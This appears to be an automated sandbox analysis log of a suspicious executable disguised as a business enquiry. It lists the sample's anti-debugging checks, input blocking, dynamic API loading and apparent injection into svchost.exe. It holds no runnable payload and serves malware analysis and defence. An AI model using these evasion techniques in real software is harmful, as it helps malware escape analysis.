            Source: firefox.exe, 0000000A.00000002.2163091931.00000191255AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | API call chain: ExitProcess graph end node graph_0-108854
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417703 LdrLoadDll, 2_2_00417703
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CB703C BlockInput, 0_2_00CB703C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C6374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_00C6374E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C946D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00C946D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CC20F6 LoadLibraryA,GetProcAddress, 0_2_00CC20F6
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_03393490 mov eax, dword ptr fs:[00000030h] 0_2_03393490
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_033934F0 mov eax, dword ptr fs:[00000030h] 0_2_033934F0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_03391E70 mov eax, dword ptr fs:[00000030h] 0_2_03391E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h] 2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h] 2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h] 2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h] 2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h] 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h] 2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h] 2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h] 2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h] 2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h] 2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h] 2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h] 2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h] 2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h] 2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h] 2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h] 2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] 2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] 2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] 2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] 2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h] 2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h] 2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h] 2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h] 2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h] 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h] 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h] 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h] 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h] 2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h] 2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h] 2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h] 2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h] 2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h] 2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h] 2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h] 2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h] 2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h] 2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h] 2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h] 2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h] 2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h] 2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
